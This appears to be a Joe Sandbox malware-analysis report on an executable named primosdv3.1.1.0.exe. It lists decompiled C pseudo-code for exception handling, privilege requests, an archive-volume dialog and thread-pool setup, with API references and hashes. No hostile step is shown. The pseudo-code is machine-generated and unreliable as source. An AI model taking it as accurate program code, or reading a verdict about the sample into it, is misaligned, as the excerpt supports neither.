0x00c87fb4
0x00c87fba
0x00c87fc2
0x00c87fc9
0x00c87fc9
0x00c87fce
0x00c87fd5
0x00c87fdc
0x00c87fee
0x00c87ff5
0x00c88014
0x00c88020
0x00c8803b
0x00c8803e
0x00c88045
0x00c8804b
0x00c88052
0x00c88055
0x00c88057
0x00c8805b
0x00c88065
0x00c88065
0x00c88067
0x00c8806d
0x00c88070
0x00c88072
0x00c88078
0x00c88079
0x00c8807f
0x00000000
0x00000000
0x00000000
0x00000000
0x00c8805d
0x00c8805d
0x00c8805d
0x00c88060
0x00c88061
0x00000000
0x00c8805d
0x00c8804d
0x00000000
0x00c8804d
0x00c88026
0x00c8802b
0x00c8802d
0x00c8802f
0x00000000
0x00c87ff7
0x00c87ff7
0x00c87ffc
0x00c87ffe
0x00c87fff
0x00c88034
0x00c88034
0x00c88082
0x00c88083
0x00000000
0x00c8808c
0x00c87f83
0x00c87f83
0x00c87f8a
0x00c87f8b
0x00c87f8d
0x00000000
0x00c87f92

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\primosdv3.1.1.0.exe,00000104), ref: 00C87FAE
_free.LIBCMT ref: 00C88079
_free.LIBCMT ref: 00C88083

Strings

C:\Users\user\Desktop\primosdv3.1.1.0.exe, xrefs: 00C87FA5, 00C87FAC, 00C87FDB, 00C88013

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\primosdv3.1.1.0.exe
API String ID: 2506810119-3985953192
Opcode ID: 466e416c663fe9c5f9b2e77081cd086af7d67ed70f02b4485f25f10e58e76ecc
Instruction ID: 3dbf7cf4435b807737978c991af13b1535056d35bc20e3a07b16bd685a3997b1
Opcode Fuzzy Hash: 466e416c663fe9c5f9b2e77081cd086af7d67ed70f02b4485f25f10e58e76ecc
Instruction Fuzzy Hash: 4131D171A00218AFCB21EF99DC81EAEBBFCEF95308F5041A6F50497211DB708E48DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00C831D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 61%

			E00C831D6(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed int _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				_t132 =  *_t96 - 0x80000003;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E00C82AEC(_t96, __ecx, __edx, _t113, _t121, _t132);
					_t133 =  *((intOrPtr*)(_t75 + 8));
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E00C82AEC(_t96, __ecx, __edx, 0, _t121, _t133) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E00C80961(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E00C80894(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00C82DB1(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E00C88D24(_t96, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					__eflags = _t78;
					if(_t78 == 0) {
						L41:
						_t80 = 1;
						__eflags = 1;
					} else {
						_t101 = _t78 + 8;
						__eflags =  *_t101;
						if( *_t101 == 0) {
							goto L41;
						} else {
							__eflags =  *_t111 & 0x00000080;
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0) {
								L23:
								_t97 = _t116[4];
								_t123 = 0;
								__eflags = _t78 - _t97;
								if(_t78 == _t97) {
									L33:
									__eflags =  *_t116 & 0x00000002;
									if(( *_t116 & 0x00000002) == 0) {
										L35:
										_t81 = _a8;
										__eflags =  *_t81 & 0x00000001;
										if(( *_t81 & 0x00000001) == 0) {
											L37:
											__eflags =  *_t81 & 0x00000002;
											if(( *_t81 & 0x00000002) == 0) {
												L39:
												_t123 = 1;
												__eflags = 1;
											} else {
												__eflags =  *_t111 & 0x00000002;
												if(( *_t111 & 0x00000002) != 0) {
													goto L39;
												}
											}
										} else {
											__eflags =  *_t111 & 0x00000001;
											if(( *_t111 & 0x00000001) != 0) {
												goto L37;
											}
										}
									} else {
										__eflags =  *_t111 & 0x00000008;
										if(( *_t111 & 0x00000008) != 0) {
											goto L35;
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										__eflags = _t98 -  *_t82;
										if(_t98 !=  *_t82) {
											break;
										}
										__eflags = _t98;
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											__eflags = _t99 -  *((intOrPtr*)(_t82 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												__eflags = _t99;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										__eflags = _t83;
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									__eflags = _t83;
									goto L31;
								}
							} else {
								__eflags =  *_t116 & 0x00000010;
								if(( *_t116 & 0x00000010) != 0) {
									goto L41;
								} else {
									goto L23;
								}
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x00c831d6
0x00c831d6
0x00c831dd
0x00c831e0
0x00c831e6
0x00c83305
0x00c831ec
0x00c831ec
0x00c831ed
0x00c831ee
0x00c831f5
0x00c831f8
0x00c831fb
0x00c83201
0x00c8320b
0x00c83230
0x00c83235
0x00c8323a
0x00c83301
0x00000000
0x00c83302
0x00c8323a
0x00c8320b
0x00c83240
0x00c83243
0x00c83246
0x00c8324c
0x00c83252
0x00c83264
0x00c83269
0x00c8326c
0x00c8326f
0x00c83272
0x00c83275
0x00c8327b
0x00c83281
0x00c83284
0x00c83287
0x00c83296
0x00c83297
0x00c83297
0x00c8329c
0x00c832af
0x00c832b1
0x00c832b6
0x00c832c1
0x00c832c3
0x00c832c5
0x00c832e1
0x00c832e6
0x00c832e9
0x00c832e9
0x00c832c1
0x00c832b6
0x00c832ef
0x00c832f0
0x00c832f3
0x00c832f6
0x00c832f9
0x00c832fc
0x00c83287
0x00000000
0x00c8327b
0x00c83306
0x00c8330b
0x00c8330f
0x00c83312
0x00c83313
0x00c83314
0x00c83315
0x00c83318
0x00c8331a
0x00c83392
0x00c83394
0x00c83394
0x00c8331c
0x00c8331c
0x00c8331f
0x00c83322
0x00000000
0x00c83324
0x00c83324
0x00c83327
0x00c8332a
0x00c83331
0x00c83331
0x00c83334
0x00c83336
0x00c83338
0x00c8336a
0x00c8336a
0x00c8336d
0x00c83374
0x00c83374
0x00c83377
0x00c8337a
0x00c83381
0x00c83381
0x00c83384
0x00c8338b
0x00c8338d
0x00c8338d
0x00c83386
0x00c83386
0x00c83389
0x00000000
0x00000000
0x00c83389
0x00c8337c
0x00c8337c
0x00c8337f
0x00000000
0x00000000
0x00c8337f
0x00c8336f
0x00c8336f
0x00c83372
0x00000000
0x00000000
0x00c83372
0x00c8338e
0x00c8333a
0x00c8333a
0x00c8333a
0x00c8333d
0x00c8333d
0x00c8333f
0x00c83341
0x00000000
0x00000000
0x00c83343
0x00c83345
0x00c83359
0x00c83359
0x00c83347
0x00c83347
0x00c8334a
0x00c8334d
0x00000000
0x00c8334f
0x00c8334f
0x00c83352
0x00c83355
0x00c83357
0x00000000
0x00000000
0x00000000
0x00000000
0x00c83357
0x00c8334d
0x00c83362
0x00c83362
0x00c83364
0x00000000
0x00c83366
0x00c83366
0x00c83366
0x00000000
0x00c83364
0x00c8335d
0x00c8335f
0x00c8335f
0x00000000
0x00c8335f
0x00c8332c
0x00c8332c
0x00c8332f
0x00000000
0x00000000
0x00000000
0x00000000
0x00c8332f
0x00c8332a
0x00c83322
0x00c83395
0x00c83399
0x00c83399

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00C831FB
_abort.LIBCMT ref: 00C83306

Strings

MOC, xrefs: 00C8320D
RCC, xrefs: 00C83215

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 399a855455ee728c1a1d00965ffb5034b6ccb43de124892c90939ddbf609df87
Instruction ID: 899c67eb2e1bf266f9e7e6a46bd379ddf41e5878b669396178daaa57fc06be53
Opcode Fuzzy Hash: 399a855455ee728c1a1d00965ffb5034b6ccb43de124892c90939ddbf609df87
Instruction Fuzzy Hash: EA416A71900249AFCF15EF94CC81AEEBBB5FF08708F148059F91467262D335AA51DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00C67401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00C67401(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t31;
				long _t38;
				void* _t45;
				void* _t48;
				intOrPtr _t49;
				void* _t62;
				void* _t63;
				void* _t66;

				_t62 = __esi;
				_t48 = __ebx;
				E00C7EB78(0xc927b7, _t66);
				E00C7EC50(0x1060);
				 *((intOrPtr*)(_t66 - 0x20)) = 0;
				 *((intOrPtr*)(_t66 - 0x1c)) = 0;
				 *((intOrPtr*)(_t66 - 0x18)) = 0;
				 *((intOrPtr*)(_t66 - 0x14)) = 0;
				 *((char*)(_t66 - 0x10)) = 0;
				_t59 =  *((intOrPtr*)(_t66 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t66 - 4)) = 0;
				_push(_t66 - 0x20);
				if(E00C63BBA( *((intOrPtr*)(_t66 + 8))) != 0) {
					if( *0xca1022 == 0) {
						if(E00C67A9C(L"SeSecurityPrivilege") != 0) {
							 *0xca1021 = 1;
						}
						E00C67A9C(L"SeRestorePrivilege");
						 *0xca1022 = 1;
					}
					_push(_t62);
					_t63 = 7;
					if( *0xca1021 != 0) {
						_t63 = 0xf;
					}
					_push(_t48);
					_t49 =  *((intOrPtr*)(_t66 - 0x20));
					_push(_t49);
					_push(_t63);
					_push( *((intOrPtr*)(_t66 + 0xc)));
					if( *0xcc3000() == 0) {
						if(E00C6BB03( *((intOrPtr*)(_t66 + 0xc)), _t66 - 0x106c, 0x800) == 0) {
							L10:
							E00C62021(_t75, 0x52, _t59 + 0x32,  *((intOrPtr*)(_t66 + 0xc)));
							_t38 = GetLastError();
							E00C66DCB(0xca1098, _t75);
							if(_t38 == 5 && E00C707BC() == 0) {
								E00C615C6(_t66 - 0x6c, 0x18);
								E00C715FE(_t66 - 0x6c);
							}
							E00C66D83(0xca1098, 1);
						} else {
							_t45 =  *0xcc3000(_t66 - 0x106c, _t63, _t49);
							_t75 = _t45;
							if(_t45 == 0) {
								goto L10;
							}
						}
					}
				}
				_t31 =  *((intOrPtr*)(_t66 - 0x20));
				 *((intOrPtr*)(_t66 - 4)) = 2;
				if(_t31 != 0) {
					if( *((char*)(_t66 - 0x10)) != 0) {
						E00C6F445(_t31,  *((intOrPtr*)(_t66 - 0x18)));
						_t31 =  *((intOrPtr*)(_t66 - 0x20));
					}
					_t31 = L00C83E2E(_t31);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t66 - 0xc));
				return _t31;
			}

0x00c67401
0x00c67401
0x00c67406
0x00c67410
0x00c67418
0x00c6741b
0x00c6741e
0x00c67421
0x00c67424
0x00c67427
0x00c6742c
0x00c6742d
0x00c6742e
0x00c67434
0x00c6743c
0x00c67449
0x00c67457
0x00c67459
0x00c67459
0x00c67465
0x00c6746a
0x00c6746a
0x00c67478
0x00c6747b
0x00c6747c
0x00c67480
0x00c67480
0x00c67481
0x00c67482
0x00c67485
0x00c67486
0x00c67487
0x00c67492
0x00c674aa
0x00c674bf
0x00c674c8
0x00c674cd
0x00c674dc
0x00c674e4
0x00c674f4
0x00c674fc
0x00c674fc
0x00c67505
0x00c674ac
0x00c674b5
0x00c674bb
0x00c674bd
0x00000000
0x00000000
0x00c674bd
0x00c674aa
0x00c6750b
0x00c6750c
0x00c6750f
0x00c67519
0x00c6751f
0x00c67525
0x00c6752a
0x00c6752a
0x00c6752e
0x00c67533
0x00c67537
0x00c6753f

APIs

__EH_prolog.LIBCMT ref: 00C67406

Part of subcall function 00C63BBA: __EH_prolog.LIBCMT ref: 00C63BBF

GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00C674CD

Part of subcall function 00C67A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C67AAB
Part of subcall function 00C67A9C: GetLastError.KERNEL32 ref: 00C67AF1
Part of subcall function 00C67A9C: CloseHandle.KERNEL32(?), ref: 00C67B00

Strings

SeSecurityPrivilege, xrefs: 00C6744B
SeRestorePrivilege, xrefs: 00C67460

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 0d28edac025a8ece930e1bed940ea0f8a2b72531b482973e70494990c353f0bd
Instruction ID: 6287a1bfa2aa39ecbcc7ba71fecf69a63aa7c34cfd74922295f58ac426cef7db
Opcode Fuzzy Hash: 0d28edac025a8ece930e1bed940ea0f8a2b72531b482973e70494990c353f0bd
Instruction Fuzzy Hash: 3B31C671D04258AADF31EBA4DC89FFE7BA8AF05308F044555F856A7182DB748B44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C7AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00C7AD10(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t19;
				void* _t22;
				WCHAR** _t24;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E00C61316(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0xcc1cb8 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0xcc1cb8), ( *0xcc1cb8)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_t19 = E00C6C29A(__eflags,  *( *0xcc1cb8));
					_t22 = E00C61100(_t30, E00C6E617(0x8e),  *( *0xcc1cb8), _t19, 0);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0xcc1cb8));
					goto L13;
				}
				goto L6;
			}

0x00c7ad11
0x00c7ad16
0x00c7ad1b
0x00c7ad20
0x00c7ad38
0x00c7adc8
0x00c7adca
0x00000000
0x00c7adca
0x00c7ad3e
0x00c7ad44
0x00c7adb7
0x00c7adb9
0x00c7adbf
0x00c7adc2
0x00000000
0x00c7adc2
0x00c7ad49
0x00c7ad5d
0x00000000
0x00c7ad5d
0x00c7ad4e
0x00c7ad51
0x00c7adad
0x00c7adb3
0x00c7ad97
0x00c7ad98
0x00000000
0x00c7ad98
0x00c7ad53
0x00c7ad56
0x00c7ad95
0x00000000
0x00c7ad95
0x00c7ad5b
0x00c7ad6a
0x00c7ad83
0x00c7ad88
0x00c7ad8a
0x00000000
0x00000000
0x00c7ad91
0x00000000
0x00c7ad91
0x00000000

APIs

Part of subcall function 00C61316: GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
Part of subcall function 00C61316: SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370

EndDialog.USER32(?,00000001), ref: 00C7AD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00C7ADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 00C7ADC2

Strings

ASKNEXTVOL, xrefs: 00C7AD28

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 5b1985a4d51d67d63dda546f8a5de60bd276312f93a3859c7159f13c2e4947bb
Instruction ID: 6ac3ba200f931a73eca27b56329128a1ae31c0f5171760494aa16eb3bb7c4a59
Opcode Fuzzy Hash: 5b1985a4d51d67d63dda546f8a5de60bd276312f93a3859c7159f13c2e4947bb
Instruction Fuzzy Hash: 5B11B632340200BFD7319F69DC85FAE7B69EFAB742F044010F645DB5A1C7619A159726

Uniqueness

Uniqueness Score: -1.00%

Function 00C6D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00C6D8EC(void* __ebx, void* __ecx, void* __edx) {
				void* __esi;
				void* _t22;
				intOrPtr _t26;
				signed int* _t30;
				void* _t33;
				void* _t41;
				void* _t43;
				void* _t45;
				void* _t47;
				void* _t49;
				void* _t50;

				_t43 = __edx;
				_t42 = __ecx;
				_t41 = __ebx;
				_t47 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t45 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) <= 0) {
					L12:
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t47 + 0x5c)) =  *((intOrPtr*)(_t47 + 0x6c));
					 *((char*)(_t47 + 8)) = 0;
					 *((intOrPtr*)(_t47 + 0x60)) = _t47 + 8;
					if( *((intOrPtr*)(_t47 + 0x74)) != 0) {
						E00C71DA7( *((intOrPtr*)(_t47 + 0x74)), _t47 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t47 + 0x70));
					if(_t26 == 0) {
						E00C705A7(_t47 + 8, "s", 0x50);
					} else {
						_t33 = _t26 - 1;
						if(_t33 == 0) {
							_push(_t47 - 0x48);
							_push("$%s");
							goto L8;
						} else {
							if(_t33 == 1) {
								_push(_t47 - 0x48);
								_push("@%s");
								L8:
								_push(0x50);
								_push(_t47 + 8);
								E00C6E5B1();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t30 = E00C86159(_t41, _t42, _t43, _t45, _t47 + 0x58,  *((intOrPtr*)(_t45 + 0x14)),  *((intOrPtr*)(_t45 + 0x18)), 4, E00C6D710);
					if(_t30 == 0) {
						goto L12;
					} else {
						_t20 = 0xc9e278 +  *_t30 * 0xc; // 0xc94788
						E00C867C0( *((intOrPtr*)(_t47 + 0x78)),  *_t20,  *((intOrPtr*)(_t47 + 0x7c)));
						_t22 = 1;
					}
				}
				return _t22;
			}

0x00c6d8ec
0x00c6d8ec
0x00c6d8ec
0x00c6d8ed
0x00c6d8f1
0x00c6d8f8
0x00c6d8fe
0x00c6d9a6
0x00c6d9a6
0x00c6d904
0x00c6d90b
0x00c6d911
0x00c6d915
0x00c6d918
0x00c6d923
0x00c6d923
0x00c6d92b
0x00c6d92e
0x00c6d969
0x00c6d930
0x00c6d930
0x00c6d933
0x00c6d948
0x00c6d949
0x00000000
0x00c6d935
0x00c6d938
0x00c6d93d
0x00c6d93e
0x00c6d94e
0x00c6d951
0x00c6d953
0x00c6d954
0x00c6d959
0x00c6d959
0x00c6d938
0x00c6d933
0x00c6d97f
0x00c6d989
0x00000000
0x00c6d98b
0x00c6d991
0x00c6d99a
0x00c6d9a2
0x00c6d9a2
0x00c6d989
0x00c6d9ad

APIs

__fprintf_l.LIBCMT ref: 00C6D954
_strncpy.LIBCMT ref: 00C6D99A

Part of subcall function 00C71DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00CA1030,?,00C6D928,00000000,?,00000050,00CA1030), ref: 00C71DC4

Strings

@%s, xrefs: 00C6D93E
$%s, xrefs: 00C6D949

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: af5c037ef2bba74981c162fb870ea4928df50686ec1491cb76fc5e41ad1981e5
Instruction ID: 18685dd687d7489dfeb54e6a2420859153cc8840e04f18827539f02dd9189691
Opcode Fuzzy Hash: af5c037ef2bba74981c162fb870ea4928df50686ec1491cb76fc5e41ad1981e5
Instruction Fuzzy Hash: BF21A572940248AEDF31EEA4CC85FDE7BA8AF05704F044022F912961A2EB71D648DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C70E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00C70E46(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 <= _t23) {
					if(_t11 == 0) {
						 *__ecx = 1;
						_t11 = 1;
					}
				} else {
					 *__ecx = _t23;
					_t11 = _t23;
				}
				_t25[0x41] = 0;
				if(_t11 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0xca1098);
					E00C66C31(E00C66C36(_t19), 0xca1098, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}

0x00c70e46
0x00c70e46
0x00c70e4e
0x00c70e54
0x00c70e56
0x00c70e5a
0x00c70e64
0x00c70e66
0x00c70e68
0x00c70e68
0x00c70e5c
0x00c70e5c
0x00c70e5e
0x00c70e5e
0x00c70e6c
0x00c70e74
0x00c70e76
0x00c70e76
0x00c70e78
0x00c70e7e
0x00c70e85
0x00c70e99
0x00c70e9f
0x00c70ea5
0x00c70eb1
0x00c70eb7
0x00c70ec1
0x00c70ecd
0x00c70ecd
0x00c70ed3
0x00c70edb
0x00c70ee1
0x00c70eea

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00C6AC5A,00000008,?,00000000,?,00C6D22D,?,00000000), ref: 00C70E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00C6AC5A,00000008,?,00000000,?,00C6D22D,?,00000000), ref: 00C70E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00C6AC5A,00000008,?,00000000,?,00C6D22D,?,00000000), ref: 00C70E9F

